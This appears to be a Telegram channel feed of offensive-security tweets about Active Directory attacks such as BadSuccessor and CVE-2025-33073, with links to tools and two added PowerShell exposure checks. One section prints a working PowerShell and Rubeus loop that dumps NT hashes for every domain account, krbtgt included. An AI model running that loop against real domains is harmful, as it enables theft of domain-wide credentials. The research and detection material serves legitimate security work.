Offensive Xwitter – Telegram
Offensive Xwitter
19.4K subscribers
908 photos
48 videos
21 files
2.09K links
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
😈 [ Yuval Gordon @YuG0rd ]

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️
Read Here -

🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory

🐥 [ tweet ]
🔥9
😈 [ Bad Sector Labs @badsectorlabs ]

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.name

If this query hits, you're in.

🐥 [ tweet ][ quote ]
👍5
😈 [ mpgn @mpgn_x64 ]

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥

🔗 https://github.com/Pennyw0rth/NetExec/pull/702

🐥 [ tweet ][ quote ]
🔥11🥱3👍1
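Added example (not the BloodHound query above, not the NetExec module, and not Akamai's code): a PowerShell check, using the RSAT ActiveDirectory module, for the two BadSuccessor preconditions those two posts test for: a Windows Server 2025 DC in the domain, and a non-privileged principal that can create msDS-DelegatedManagedServiceAccount objects in some OU. The dMSA class GUID is read from the schema rather than hardcoded; the built-in admin SIDs it skips are an assumption about what you do not need to see.

```powershell
# Added example: BadSuccessor exposure check with the RSAT ActiveDirectory module.
# Run as any domain user on a domain-joined host (reading OU ACLs needs no special rights).
Import-Module ActiveDirectory

function Get-Server2025DomainControllers {
    # Precondition 1: dMSAs need at least one Windows Server 2025 DC.
    Get-ADDomainController -Filter * |
        Where-Object { $_.OperatingSystem -like '*2025*' } |
        Select-Object Name, OperatingSystem, IsGlobalCatalog
}

function Get-BadSuccessorOUPermissions {
    # Precondition 2: a principal that can create msDS-DelegatedManagedServiceAccount objects in an OU
    # (CreateChild limited to that class, CreateChild on any class, or GenericAll/WriteDacl/WriteOwner on the OU).
    $schemaNc  = (Get-ADRootDSE).schemaNamingContext
    $dmsaClass = Get-ADObject -SearchBase $schemaNc `
        -LDAPFilter '(lDAPDisplayName=msDS-DelegatedManagedServiceAccount)' -Properties schemaIDGUID
    if (-not $dmsaClass) {
        Write-Warning 'No msDS-DelegatedManagedServiceAccount class in the schema (pre-2025 schema): dMSAs cannot be created here.'
        return
    }
    $dmsaGuid = [guid]$dmsaClass.schemaIDGUID   # read from the schema, not hardcoded
    $anyClass = [guid]::Empty                   # ObjectType 0000... = CreateChild for every class

    $AR = [System.DirectoryServices.ActiveDirectoryRights]
    # Assumption: trustees that are already domain-admin-equivalent are noise for this check.
    $skipSids = 'S-1-5-18', 'S-1-5-32-544'          # SYSTEM, BUILTIN\Administrators
    $skipRids = '-512', '-516', '-518', '-519'      # Domain Admins, Domain Controllers, Schema Admins, Enterprise Admins

    foreach ($ou in Get-ADOrganizationalUnit -Filter *) {
        $acl = Get-Acl -Path "AD:\$($ou.DistinguishedName)"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { $sid = $ace.IdentityReference.Value }
            if ($skipSids -contains $sid) { continue }
            if ($skipRids | Where-Object { $sid.EndsWith($_) }) { continue }

            $rights = $ace.ActiveDirectoryRights
            $canCreateDmsa = (($rights -band $AR::CreateChild) -ne 0) -and
                             ($ace.ObjectType -eq $dmsaGuid -or $ace.ObjectType -eq $anyClass)
            # GenericAll is a combined mask, so test for the full mask rather than any overlapping bit
            $controlsOu    = (($rights -band $AR::GenericAll) -eq $AR::GenericAll) -or
                             (($rights -band $AR::WriteDacl) -ne 0) -or
                             (($rights -band $AR::WriteOwner) -ne 0)
            if ($canCreateDmsa -or $controlsOu) {
                [pscustomobject]@{
                    OU        = $ou.DistinguishedName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $rights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

Get-Server2025DomainControllers | Format-Table -AutoSize
Get-BadSuccessorOUPermissions   | Sort-Object OU, Principal | Format-Table -AutoSize
```

If the first function prints nothing, the dMSA path is not open yet regardless of what the second one finds. The ACL walk does not evaluate InheritedObjectType or inherit-only flags, so treat its hits as candidates to confirm by hand, and it walks OUs only, not containers such as CN=Managed Service Accounts.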
😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

🔗 https://github.com/cybrly/badsuccessor

🐥 [ tweet ]
🔥6👍3🥱2
😈 [ Yuval Gordon @YuG0rd ]

Many missed this on #BadSuccessor: it's also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal: krbtgt, users, machines. No DCSync required, no code execution on the DC.

🐥 [ tweet ]

What a demolition 😂🤣

upd. for reference, the author does something like this, with his own build of Rubeus:

# $kirbi: base64 TGT of the principal the dMSA lets authenticate (its msDS-GroupMSAMembership)
$kirbi = '<base64 .kirbi>'
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
# every user (krbtgt included) and every computer in the domain
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
+ @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    # point the dMSA at the next "predecessor", then ask the KDC for the dMSA's TGT:
    # the KERB-DMSA-KEY-PACKAGE in the reply carries the predecessor's keys
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    # the rc4_hmac key Rubeus prints is the NT hash
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
😁13🔥9🥱2
😈 [ Matt Ehrnschwender @M_alphaaa ]

I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.

🔗 https://github.com/MEhrn00/boflink

Supporting blog post about it.

🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/

🐥 [ tweet ]
🍌7😁1
Forwarded from PT SWARM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.

This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.

If you're running Roundcube — update immediately!
🔥25🥱1🍌1
😈 [ Aditya Telange @adityatelange ]

evil-winrm-py v1 released🌟

🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0

🐥 [ tweet ]
👍6🔥6
😈 [ Fabian @testert01 ]

Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.

@micahvandeusen, @_dirkjan, nice tools :)

🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/

🐥 [ tweet ]
👍6
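Added example, not from the write-up linked above: a PowerShell walk of the chain that tweet describes, using the RSAT ActiveDirectory module plus PowerShell remoting. It lists gMSAs with unconstrained delegation, expands msDS-GroupMSAMembership to the computers that may retrieve each gMSA's password, and checks those hosts for the two coercion prerequisites the tweet names (the WebClient service, and an LmCompatibilityLevel that still permits NTLMv1). The remote part assumes local admin on the retriever hosts; gMSA and host names are whatever your domain returns.

```powershell
# Added example: gMSA unconstrained-delegation exposure check (RSAT ActiveDirectory module + PS remoting).
Import-Module ActiveDirectory

function Get-UnconstrainedDelegationGmsa {
    # gMSAs with TRUSTED_FOR_DELEGATION (0x80000) set in userAccountControl.
    Get-ADServiceAccount `
        -LDAPFilter '(&(objectClass=msDS-GroupManagedServiceAccount)(userAccountControl:1.2.840.113556.1.4.803:=524288))' `
        -Properties PrincipalsAllowedToRetrieveManagedPassword, ServicePrincipalNames
}

function Resolve-RetrieverComputers {
    param([string[]]$PrincipalDNs)
    # msDS-GroupMSAMembership (exposed as PrincipalsAllowedToRetrieveManagedPassword) holds
    # computers and/or groups; expand groups so we end up with the hosts that can read the password.
    foreach ($dn in $PrincipalDNs) {
        $obj = Get-ADObject -Identity $dn
        switch ($obj.ObjectClass) {
            'computer' { Get-ADComputer -Identity $dn }
            'group'    {
                Get-ADGroupMember -Identity $dn -Recursive |
                    Where-Object { $_.objectClass -eq 'computer' } |
                    ForEach-Object { Get-ADComputer -Identity $_.DistinguishedName }
            }
        }
    }
}

function Test-RetrieverHostExposure {
    param([string]$ComputerName)
    # Needs local admin on the target host. A WebClient service that is not disabled means WebDAV
    # coercion is on the table; LmCompatibilityLevel below 3 means the host may answer a challenge
    # with NTLMv1 (when the value is absent the OS default of 3 applies).
    Invoke-Command -ComputerName $ComputerName -ErrorAction Stop -ScriptBlock {
        $svc = Get-Service -Name WebClient -ErrorAction SilentlyContinue
        $lm  = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
                    -Name LmCompatibilityLevel -ErrorAction SilentlyContinue).LmCompatibilityLevel
        $web = if ($svc) { "$($svc.Status) ($($svc.StartType))" } else { 'not installed' }
        $lmText = if ($null -eq $lm) { 'not set (default 3)' } else { $lm }
        [pscustomobject]@{
            Computer        = $env:COMPUTERNAME
            WebClient       = $web
            LmCompatibility = $lmText
            WebDavPossible  = ($null -ne $svc -and $svc.StartType -ne 'Disabled')
            NtlmV1Possible  = ($null -ne $lm -and $lm -lt 3)
        }
    }
}

foreach ($gmsa in Get-UnconstrainedDelegationGmsa) {
    "== $($gmsa.SamAccountName)  SPNs: $($gmsa.ServicePrincipalNames -join ', ')"
    foreach ($pc in Resolve-RetrieverComputers -PrincipalDNs $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
        try   { Test-RetrieverHostExposure -ComputerName $pc.DNSHostName | Format-List }
        catch { "  $($pc.Name): could not query ($($_.Exception.Message))" }
    }
}
```

A gMSA that shows up here with a retriever host where WebDavPossible or NtlmV1Possible is true is the combination the tweet warns about; the fix is to drop unconstrained delegation on the gMSA (constrained or resource-based delegation instead), disable WebClient where it is not needed, and raise LmCompatibilityLevel to at least 3.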
😈 [ mr.d0x @mrd0x ]

Finally had some time to publish these blogs. Enjoy!

Spying On Screen Activity Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/

Camera and Microphone Spying Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/

🐥 [ tweet ]
👍7🥱4
😈 [ James Woolley @Xtrato ]

I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions 👆

🐥 [ tweet ]
🥱20🍌7👍5😁3🤯1
😈 [ RedTeam Pentesting @RedTeamPT ]

🚨 Our new blog post about Windows CVE-2025-33073, which we discovered, is live.

🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:

🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/

👀 We have also released a paper which really goes into the nitty-gritty for those who are interested:

🔗 https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf

🐥 [ tweet ]
🔥11
😈 [ Synacktiv @Synacktiv ]

Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Check out the details in the blog post by @yaumn_ and @wil_fri3d.

🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

🐥 [ tweet ]
🥱8👍4
😈 [ Praetorian @praetorianlabs ]

🚨 New attack disclosed: GitHub Device Code Phishing

John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.

📖 Blog covers methodology, red team case studies & detection strategies

🔗 https://www.praetorian.com/blog/introducing-github-device-code-phishing/

🐥 [ tweet ]
🔥7
😈 [ Jonathan Beierle @hullabrian ]

I just released COMmander - a .NET tool designed to provide an easy to use interface for COM and RPC based attacks. It taps into the Microsoft-Windows-RPC ETW provider and allows you to provide a customizable rule set for detections.

🔗 https://github.com/HullaBrian/COMmander

🐥 [ tweet ]
🔥4👍1
Forwarded from Positive Technologies
👽 Breaking into large financial companies is not only a goal for hackers but also a challenge for the red teamers at PT SWARM

How the team prepared for and carried out social-engineering attacks, what came of it, and how it helped the clients is described in detail in an article for Positive Research by Konstantin Polishin, head of the Red Team SE group in the penetration testing department at Positive Technologies.

You will be surprised how much can be learned about a company using passive reconnaissance alone. For example, the technology stack in use is easy to find in IT job postings and employee résumés, and corporate e-mail addresses turn up in public data leaks and infostealer logs. And if you gather information actively, you can assemble whole dossiers on the prospective victims from various sources.

🎣 Next comes carefully selecting a focus group, developing a phishing scenario, and casting the line again and again until it works. To do that, red teamers (like the attackers they emulate) carefully study the contents of mailboxes, keywords in e-mails, the corporate communication style, and the internal life and processes of the company.

👽👽 Want to see an attack from the inside in the smallest detail? Read the new piece in our media, a cool investigative report.

#PositiveResearch
@Positive_Technologies
👍9🍌4
😈 [ Elastic Security Labs @elasticseclabs ]

Dive deep into malware detection with the latest article by John Uhlmann: "Call Stacks: No More Free Passes for Malware." Discover how call stacks provide vital insights into malware behavior. Read more:

🔗 https://www.elastic.co/security-labs/call-stacks-no-more-free-passes-for-malware/

🐥 [ tweet ]
👍3🔥2
😈 [ SpecterOps @SpecterOps ]

Introducing the BloodHound Query Library!

📚 https://queries.specterops.io/

@martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.

🔗 https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/

🐥 [ tweet ]
🔥11
😈 [ Alex Neff @al3x_n3ff ]

Did you know that you can kerberoast without any valid credentials? All you need is an account that is ASREProastable.
This allows you to request service tickets for any account with a set SPN🔥

NetExec now has a native implementation of this technique, thanks to Azox

🐥 [ tweet ]
🔥17🥱6👍2